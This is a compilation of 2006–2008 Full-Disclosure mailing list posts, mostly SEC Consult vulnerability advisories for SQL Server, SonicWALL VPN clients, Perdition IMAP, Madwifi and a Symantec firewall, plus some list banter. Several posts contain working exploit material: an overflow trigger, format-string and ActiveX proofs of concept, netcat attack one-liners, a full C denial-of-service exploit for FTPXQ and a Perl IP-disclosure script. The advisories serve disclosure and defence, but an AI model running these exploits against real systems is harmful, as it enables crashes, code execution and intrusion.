@vb_buffer varbinary, @vb_bufferlen int, @buf nvarchar; exec master.dbo.sp_replwritetovarbin 1, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' SET @val = CHAR(0x41) SET @counter = 0 WHILE @counter 3000 BEGIN SET @counter = @counter + 1 SET @buf = @buf + @val END SET @buf = @buf + ''',''1'',''1'',''1'', ''1'',''1'',''1'',''1'',''1'',''1''' EXEC master..sp_executesql @buf This triggers an access violation exception (write to address 0x41414141). The vulnerability has been successfully used to execute arbitrary code on a lab machine. SEC Consult will not release code execution exploits for this vulnerability to the public. Workaround: --- Remove the sp_replwriterovarbin extended stored procedure. Run the following as an administrator: execute dbo.sp_dropextendedproc 'sp_replwritetovarbin' See also: Removing an Extended Stored Procedure from SQL Server http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx Patch: -- According to an email received by Microsoft in September, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown. Vendor timeline: --- Vendor notified: 2008-04-17 Vendor response: 2008-04-17 Last response from Microsoft: 09-29-2008 Request for update status 1: 10-14-2008 Request for update status 2: 10-29-2008 Request for update status 3: 11-12-2008 Request for update status 4 and prenotification about advisory release date: 11-28-2008 Public release: 11-09-2008 -- SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20081016-0 :: Remote command execution in Instant Expert Analysis
SEC Consult Security Advisory 20081016-0 title: Remote command execution in Instant Expert Analysis signed Java applet and signed ActiveX control program: Instant Expert Analysis vendor: Husdawg, LLC impact: Critical homepage: http://www.systemrequirementslab.com found: 2008-04-19 by: David Matscheko / SEC Consult / www.sec-consult.com Vendor description: --- Instant Expert Analysis is a patent-pending technology that allows websites to have a one-click method for rapidly analyzing a users hardware and software. The results are then instantaneously compared to a comprehensive database of requirements. Instant Expert Analysis has been proven effective by millions of users on sites run by NVIDIA, Activision, Electronic Arts UK, Eidos, CNET, IGN, and AMD. [source: http://www.husdawg.com/systemrequirementslab/Home2.html] Vulnerability overview: --- Instant Expert Analysis uses a signed Java applet for Firefox or Netscape browsers and a signed ActiveX plugin for Internet Explorer. Both applets allow an attacker to download and execute arbitrary applications when the user visits an infected website. If the user already accepted the applet on a valid site, no user interaction is needed to perform this attack! Because the applets are signed by a trustet source, the browsers default behavior is to ask only the first time. Vulnerability description: -- The init method of the sysreqlab2.jar or the sysreqlab2.cab can be called like the following example (from the Javascript): document.SysReqLab.Init(http://www.example.com;, abc); The applet then downloads and executes a dll file from http://www.systemrequirementslab.com. The dll file loads a setup_abc.exe, a setup_mz_abc.exe, or a setup_ie_abc.exe from the location that has been stated in the init method (e.g. the attackers website) and executes it. Proof of concept: - The attacker can serve the following files from any host: setup_abc.exe setup_ie_abc.exe setup_mz_abc.exe sysreqlab2.cab sysreqlab2.jar exploit.html The setup_*.exe files are the trojan applications. == The full proof of concept has been removed from the public version of this advisory. == Vulnerable versions: No version information could be found for the affected files. Vendor contact timeline: 2008-05-08: Vulnerability information sent to vendor ([EMAIL PROTECTED]) 2008-06-20: We got informed that the main component has been updated, and a kill bit process has been initialized with Microsoft. 2008-08-13: Received E-Mail from vendor that a case has been opened by Microsoft. 2008-10-13: SEC Consult requests an update from Husdawg on how the killbit process is going and informs Husdawg that a public advisory will be released on October 20th 2008. 2008-10-14: An US CERT vulnerability note is released, crediting Andre Protas of eEye Digital Security and Greg Linares. SEC Consult has not been prenotified about the release and has not been credited by the vendor or other parties involved. Workaround: --- Block the ActiveX plugin from Husdawg, LLC and don't run it. Remove the Certificate of the Java applet from Husdawg, LLC from Control Panel / Java / Security / Certificates / Trusted Certificates and don't allow the applet to run. Patch: -- An update is available from the vendor: http://www.systemrequirementslab.com/bulletins/security_bulletin_1.html Additionally, the killbit for the affected ActiveX component has been set by Microsoft: http://www.microsoft.com/technet/security/advisory/956391.mspx SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF David Matscheko / @2008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Whitepaper: DNS zone redelegation
Newly emerging techniques of DNS cache poisoning have caused quite a stir recently, prompting security researchers to speculate on the nature of the issue, and naturally inducing press stunts by some individuals, including accidential information leaks and hasty exploit releases. Many other, more relaxed researchers, who had figured out the attack and had coded working exploits within a few hours (which, by the way, was incredibly easy to do, knowing that an undocumented attack actually existed), decided to coordinate with Dan Kaminsky, who had organized a huge multi-vendor security patch, and withhold information for the proposed 30 days. SEC Consult's researchers were among the first to write a working fast cache poisoning exploit, details of which will now be published in a whitepaper, which also includes some calculations on the reliability of the attack. The paper details a way of making DNS cache poisoning / response spoofing attacks more reliable. A caching server will store any NS delegation RRs if it receives a delegation which is closer to the answer than the nameservers it already knows. By spoofing replies that contain a delegation for a single node, the nameserver will eventually cache the delegation when we hit the right transfer id. http://www.sec-consult.com/whitepapers_e.html Regards, Bernhard -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Interesting things at sec-consult.com, DNS-whitepaper available tomorrow
Hello, We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at SEC Consult website. The presentations (some of which are in german) will include everything from general howtos to highly specialized pentesting-stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :) The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at: http://www.sec-consult.com/publikationen_e.html Here are some links to what is already online: * A german guide to WEP/WPA cracking, by Johannes Greil: http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf * A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications): http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf * A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl: http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf I hope that some of you will find this useful. Regards, Bernhard (Certified Internet Security Superstar) -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (no subject)
Hello, We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at SEC Consult website. The presentations (some of which are in german) will include everything from general howtos to highly specialized pentesting-stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :) The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at: http://www.sec-consult.com/publikationen_e.html Here are some links to what is already online: * A german guide to WEP/WPA cracking, by Johannes Greil: http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf * A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications): http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf * A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl: http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf I hope that some of you will find this useful. Regards, Bernhard (Certified Internet Security Superstar) -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
On Wed, 2008-08-06 at 02:26 +0200, Ureleet wrote: does that research involve you using a subject line in ur emails? No, I left it out intentionally to provoke one of your useless posts. When n3td3v does a pushup, he isn't lifting himself up, he's pushing the Earth down! -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firewire Attack on Windows Vista
Hello, In the light of recent discussions about firewire / DMA hacks, we would like to throw in some of the results of our past research on this topic (done mainly by Peter Panholzer) in the form of a short whitepaper. In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau´s winlockpwn) can be used against Windows Vista. The paper is available at: http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf Best regards, Bernhard -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20071204-0 :: SonicWALL Global VPN Client Format String Vulnerability
SEC Consult Security Advisory 20071204-0 = title: SonicWALL Global VPN Client Format String Vulnerability program: SonicWALL Global VPN Client vulnerable version: 4.0.0.830 homepage: www.sonicwall.com found: 06-12-2007 by: lofi42* perm. link: http://www.sec-consult.com/305.html = Vendor description: --- The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway. Vulnerabilty overview: --- SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability allows an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice his victim into importing the special configuration file. Vulnerability details: --- Format string errors occur when the client parses the name attribute of the Connection tag and the content of the Hostname Tags in the configuration file. Examples: Connection name=%s%s%s%s HostName%s%s%s%s/HostName The bugs has been verified in version 3.1.556 and beta 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version 4.0.0.810, the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version trying to write the imported configuration to an extra debug log. Proof-of-concept: --- In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this... Connection name= AA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.% x.%x HostName BB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.% x.%x.%x.%x.%x.%x.%x ...yields the following logfile: -- Connection name --- OnLogMessage(): 'The connection AAe64d20.37327830.46413139. 203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427. 6e6f6320.7463656e.206e6f69.41414122.41414141.25414141 has been enabled.' '' --/Connection name --- --HostName BB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825. 78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e. 74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242' --/HostName--- This vulnerability allows reading / writing to arbitrary memory addresses within the process memory space. Exploitation is trivial under these circumstances. vendor status: --- vendor notified: 2007-08-16 vendor response: 2007-08-29 patch available: 2007-11-26 The issue has been fixed in SonicWall VPN client 4.0.0.830. ~ * The vulnerabilities described above have been purchased by SEC Consult from an independent security researcher. In the research bonus programme, SEC Consult is looking for security vulnerabilities in common software products. For more information, contact research [at] sec-consult [dot] com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client
SEC Consult Security Advisory 20071101-0 = title: Multiple vulnerabilities in SonicWALL SSL-VPN Client * Deletion of arbitrary files on the client * Arbitrary code execution thru various buffer overflows program: SonicWALL SSL-VPN vulnerable version: SonicWALL SSL-VPN 1.3.0.3 WebCacheCleaner ActiveX Control 1.3.0.3 NeLaunchCtrl ActiveX Control 2.1.0.49 homepage: www.sonicwall.com found: 04-23-2007 by: lofi42 perm. link: http://www.sec-consult.com/303.html = Vendor description: --- SonicWALL SSL-VPN solutions can be configured to provide users with easy-to-use, secure and clientless remote access to a broad range of resources on the corporate network. Vulnerabilty overview: --- The SonicWALL SSL-VPN solution comes with various ActiveX Controls which allows users to access the VPN with Internet Explorer. These controls contain various vulnerabilities. An attacker could take control of the affected clients by placing exploit code on a webserver. He would then have to entice VPN users to visit the website, e.g. by conducting a phishing attack. Various other attack vectors exist (DNS redirection, owning an intranet website, ...). Vulnerability details: --- 1.) Deletion of arbitrary files The WebCacheCleaner ActiveX Control provides the method FileDelete() which, working as advertised, allows the attacker to delete arbitrary files on the client. === Proof of Concept 1 (VBScript) === dim o Set o = CreateObject(MLWebCacheCleaner.WebCacheCleaner.1) o.FileDelete(c:\bla\bla) === /Proof of Concept 1 === 2.) Multiple buffer overflows A stack-based buffer overflow exists in the AddRouteEntry() method of the NELaunchCtrl ActiveX Control. Specifically, the second paramter to this method is copied to into a stack buffer without length validiation. Use the following to make the process jump into UVWX-land: o.AddRouteEntry (, ABCDEFGHIJKLMNOPQRSTUVWX); Additionally, the following properties suffer from Unicode overflows: serverAddress sessionId clientIPLower clientIPHigher userName domainName dnsSuffix === Proof of Concept 2 === A code execution exploit will not be released to the public. However, as exploitation is trivial, we strongly advise to perform an update. vendor status: --- vendor notified: 2007-05-21 vendor response: 2007-05-21 patch available: September 2007 The issues have been fixed with version 2.1 of SSL-VPN 200 and version 2.5 of SSL-VPN 2000/4000. ~ * The vulnerabilities described above have been purchased by SEC Consult from an independent security researcher. In the research bonus programme, SEC Consult is looking for security vulnerabilities in common software products. For more information, contact research [at] sec-consult [dot] com EOF Bernhard Mueller / SEC Consult ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20071031-0 :: Perdition IMAP Proxy Format String Vulnerability
SEC Consult Security Advisory 20071031-0 title: Perdition IMAP proxy str_vwrite format string vulnerability program: Perdition Mail Retrieval Proxy vulnerable version: =1.17 homepage: http://www.vergenet.net/ found: August 2007 by: Bernhard Mueller / SEC Consult permanent link: http://www.sec-consult.com/300.html Vendor description: --- Perdition is a fully featured POP3 and IMAP4 proxy server. It is able to handle both SSL and non-SSL connections and redirect users to a real-server based on a database lookup. Vulnerability overview: --- Perdition IMAPD is affected by a format string bug in one of its IMAP output-string formatting functions. The bug allows the execution of arbitrary code on the affected server. A successful exploit does not require prior authentication. Vulnerability details: --- 1.) In certain situations, the IMAP-Tag (first part of IMAP-command) is copied into a character buffer without validation. This buffer is then ultimately passed to vsnprintf() as a format string. 2.) Before the call to vsnprintf, a validation of the format string is performed as a protection against format string injection. From str.c: ++ 168: static const char *__str_vwrite(io_t * io, const flag_t flag, 169:const size_t nargs, const char *fmt, va_list ap, 170:int *bytes) 171: { (...) 186:fmt_args = 0; 187:for (place = 0; fmt[place] != '\0'; place++) { 188:if (fmt[place] == '%') 189:fmt[place + 1] == '%' ? place++ : fmt_args++; 190:} 191:if (fmt_args != nargs) { (...) 195:VANESSA_LOGGER_DEBUG_UNSAFE(nargs and fmt mismatch: 196:%d args requested, %d args in format, 197:nargs, fmt_args); 198:return (NULL); 199:} 200: 201:*bytes = vsnprintf(__str_write_buf, STR_WRITE_BUF_LEN - 2, fmt, ap); In line 187-191, the actual number of format identifiers is compared to supposed number given in the parameter nargs. This check can however be bypassed by injecting a null-byte in the end of the IMAP-tag. The null-byte cuts of the rest of the string (with the original format identifiers intended by the programmer). Therefore it is possible to inject 'nargs' arbitrary format identifiers within the IMAP tag. In practice, only a single format identifier can be controlled by the attacker. This is not very nice to exploit, however arbitrary code execution is still possible. For example, multiple successive single-byte-writes on a global function pointer can be used to gain control of the instruction pointer. Due to the nature of the vulnerability, a good exploit can bypass most OS security features (non-exec-stack, ASLR, etc.) as well as compiler features (stack canaries,...). Proof-of-Concept SEC Consult has created a working proof-of-concept (code-execution-)exploit, which will not be released to the public at this time. The following can be used to test for the vulnerability: perl -e 'print abc%n\x00\n' | nc perdition.example.com 143 Vulnerable versions: --- Perdition IMAPD = 1.17 The vulnerability has been fixed in Perdition v1.17.1. The new tarball and Debian packages can be found at: http://www.vergenet.net/linux/perdition/download/1.17.1/ http://www.vergenet.net/linux/perdition/download/latest/ vendor status: --- vendor notified: 2007-10-12 vendor response: 2007-10-12 patch available: 2007-10-31 ~ EOF Bernhard Mueller / research [AT] sec-consult [DOT] com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20071012-0 :: Madwifi xrates element remote DOS
SEC Consult Security Advisory 20071012-0 === title: Madwifi xrates element remote DOS program: Madwifi linux wlan driver for atheros chipsets vulnerable version: Madwifi = 0.9.3.2 homepage: www.madwifi.org found: July 2007 by: Clemens Kolbitsch, Sylvester Keil Secure Systems Lab / Technical University of Vienna http://seclab.tuwien.ac.at/ SEC Consult Vulnerability Lab http://www.sec-consult.com/ perm. link: http://www.sec-consult.com/298.html === Vendor description: --- MadWifi is one of the most advanced WLAN drivers available for Linux today. It is stable and has an established userbase. The driver itself is open source but depends on the proprietary Hardware Abstraction Layer (HAL) that is available in binary form only. Vulnerability overview: --- A specially crafted beacon frame causes the driver to exit(), leading to a kernel panic on the affected machine. An attacker could crash client machines that are listening for beacons using a fake access point. Vulnerability details: --- In short, the driver exits (via the BUG() macro) if a beacon frame with a high length value (15) in the extended supported rates element is received. This leads to a kernel panic. From net80211/ieee80211_scan_sta.c: 217 static int sta_add(...): KASSERT(sp-rates[1] = IEEE80211_RATE_MAXSIZE, (rate set too large: %u, sp-rates[1])); memcpy(ise-se_rates, sp-rates, 2 + sp-rates[1]); if (sp-xrates != NULL) { /* XXX validate xrates[1] */ KASSERT(sp-xrates[1] = IEEE80211_RATE_MAXSIZE, (xrate set too large: %u, sp-xrates[1])); memcpy(ise-se_xrates, sp-xrates, 2 + sp-xrates[1]); } else ise-se_xrates[1] = 0; IEEE80211_RATE_MAXSIZE is defined as 15. If the KASSERT() fails the BUG-macro, which exits the driver, is called. Vulnerability status: --- The bug has been fixed in SVN revision 2736 [1]. Timeline: --- vendor notified: 2007-10-11 vendor response: 2007-10-11 patch available: 2007-10-12 Additional info --- This vulnerability has been found using a novel wireless fuzzing approach developed in a joint project by the Secure Systems Lab (Technical University of Vienna) and the SEC Consult Vulnerability Lab. The technique, which allows very effective stateful fuzzing of wireless drivers by using emulated wireless chipsets, will be presented in detail on the Blackhat Briefings Japan [2] as well as the DeepSec IDSC in Vienna, Austria [3] in the talks by Sylvester Keil and Clemens Kolbitsch. References -- [1] http://madwifi.org/changeset/2736 [2] http://www.blackhat.com/html/bh-japan-07/bh-jp-07-main.html [3] https://deepsec.net/ ~ EOF Bernhard Mueller / research [at] sec-consult [dot] com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FTPXQ Denial of service exploit.
Hello, And here's the bash/perl port: [EMAIL PROTECTED] ~ $ perl -e print USER lol\r\nPASS lol\r\nMKD .(Ax255).\r\n | nc www.victim.com 21 Cheers, Bernhard Federico Fazzi wrote: /* * 0xf_ftpxq.c - FTPXQ Denial of service exploit. * Federico Fazzi [EMAIL PROTECTED] * * advisory by Eric Sesterhenn. * -- Server built using the WinsockQ from DataWizard Technologies. A security * -- vulnerability in the product allows remote attackers to overflow an * -- internal buffer by providing an overly long make directory request. * * r20061025. */ #include stdio.h #include stdlib.h #include unistd.h #include string.h #include netdb.h #include arpa/inet.h #include sys/types.h #include netinet/in.h #include sys/socket.h // ..AA*255 in hex format. char bof[] = \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41; int main(int argc, char **argv) { int sd; socklen_t len; struct sockaddr_in saddr; struct hostent *he; char buf[512], tmpbuf[128]; if(argc != 5) { printf(FTPXQ Server - Denial of service exploit.\n Federico Fazzi [EMAIL PROTECTED]\n\n usage: %s hostname port user password\n, argv[0]); exit(1); } if((he = gethostbyname(argv[1])) == NULL) { perror(gethostbyname()); exit(1); } // init socket if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) 0) { perror(socket()); exit(1); } // setup struct bzero((char *) saddr, sizeof(saddr)); saddr.sin_family = AF_INET; bcopy((char *)he-h_addr, (char *)saddr.sin_addr.s_addr, he-h_length); saddr.sin_port = htons(atoi(argv[2])); len = sizeof(struct sockaddr); // init connection if(connect(sd, (struct sockaddr *)saddr, len) == -1) { perror(connect()); exit(1); } printf(FTPXQ Server - Denial of service exploit.\n Federico Fazzi [EMAIL PROTECTED]\n ---\n); puts(connecting..\t\t done); // sending a USER data to daemon sprintf(buf, USER %s\r\n, argv[3]); write(sd, buf, strlen(buf)); puts(sending USER data..\t done); // sending a PASS data to daemon sprintf(buf, PASS %s\r\n, argv[4]); write(sd, buf, strlen(buf)); puts(sending PASS data..\t done); // sending a BOF string with MKD command to host sprintf(buf, MKD %s, bof); write(sd, bof, strlen(bof)); puts(sending MKD bof string.. done); // now checking if server i down if(read(sd, tmpbuf, sizeof(tmpbuf)) 0) puts([!] server doesn't vulnerable); else puts([+] server getting down.. done); close(sd); return(0); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- _ DI (FH) Bernhard Mueller IT Security Consultant SEC-Consult Unternehmensberatung GmbH www.sec-consult.com A-1080 Vienna, Blindengasse 3 phone +43 1 8903043 0 fax +43 1 8903043 15 mobile +43 676 840301 718 email [EMAIL PROTECTED] Advisor for your information security. __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] All new anti-cyber terror website
You have to look more carefully, there actually ARE some 0day techniques described on the page. If the buffer limit set by the program can be increased, then your enterprise class software is compromised, along with data held on local hosts. also known as 'buffer limit exaltation' or 'memory allocation widening' attacks. Q-Ball wrote: The promised 0-days are about as real as n3td3v himself. On 6/15/06, *Aaron Gray* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Yes, but where are the promised zerodays ? vaporware ? - Original Message - *From:* n3td3v mailto:[EMAIL PROTECTED] *To:* full-disclosure@lists.grok.org.uk mailto:full-disclosure@lists.grok.org.uk ; [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] *Sent:* Wednesday, June 14, 2006 6:03 PM *Subject:* [Full-disclosure] All new anti-cyber terror website === For public distribution. === New website launched. === n3td3v group launched a new website last night and is ready for web traffic. === We pride ourselves in our continued work with the underworld at Google and Yahoo. === We are a professional group of users with good intentions. === Learn more about the all new n3td3v website today. === Is your corporation Google or Yahoo? Have you ever wondered who is behind your security incidents?... === Its time for n3td3v, its time for http://n3td3v.googlepages.com === Remember to click on the security, intelligence and network link(s) at the top of the website! === Many Thanks, === n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.394 / Virus Database: 268.8.4/363 - Release Date: 13/06/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I'm ready to tell the police
For you own safety, you should ensure that they take you into witness protection... and when you have your new personality, be careful NOT TO POST TO ANY SECURITY LISTS! This is not a game anymore. Good luck! n3td3v wrote: I'm sick of lying for yahoo employees I've gone on for 7 years lying for them I want to tell the police everything I know Someone off list tell me how to report this guy The n3td3v group was a joint effort of yahoo and google employees I want to hand them in now Regards, n3td3v I fell out with an employee, thats why i'm going public ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure
SEC Consult Security Advisory 20060512-0 == title: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure program: Symantec Enterprise FW vulnerable version: 8.0 homepage: www.symantec.com found: 2005-09-13 by: SEC Consult / www.sec-consult.com == Vendor description: --- Symantec's Enterprise Firewall provides complete network protection by integrating smart application-level proxies, network circuits and packet filtering into a special perimeter-security architecture (...) Vulnerabilty overview: --- Enterprise FW leaks internal IPs of natted machines in response to certain HTTP requests. Vulnerability details: --- A request of the form get/XX HTTP/1.0 (note the missing space) triggers the exposure. The firewall seems to forward the request and to wait a certain time for a reply from the webserver, until the timeout is reaches. the final response from the firewall looks like: [EMAIL PROTECTED]:~ netcat www.behind-raptor.com 80 get/01 http/1.0 HTTP/1.1 504 Gateway Timeout MIME-Version: 1.0 Server: Simple, Secure Web Server 1.1 Date: Tue, 13 Sep 2005 06:23:32 GMT Connection: close Content-Type: text/html [...] The request seen by the firewall was: ttulli http://10.238.94.57/01 Here's a simple script to map external to internal IPs. --- #!/usr/bin/perl # [title] raptor firewall internal IP disclosure 'exploit' # [mailto] research [at] sec-consult [dot} com # # [EMAIL PROTECTED]:~/home/sk0L perl raptor-nat.pl behind.raptor.com # waiting for timeout (this can take about 1 min.) # behind.raptor.com: 10.238.94.67 use IO::Socket; $| = 1; $host = $ARGV[0] or die $0 host\n; $request = getXXX/XXX HTTP/1.0\n\n; my $sock = new IO::Socket::INET ( PeerAddr = $host, PeerPort = 80, Proto = 'tcp', ); die could not open socket: $!\n unless $sock; print $sock $request; print waiting for timeout (this can take about 1 min.)\n; while ($sock) { if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) { $ip = $1; } } if (defined($ip)) { print $host: $ip\n; } 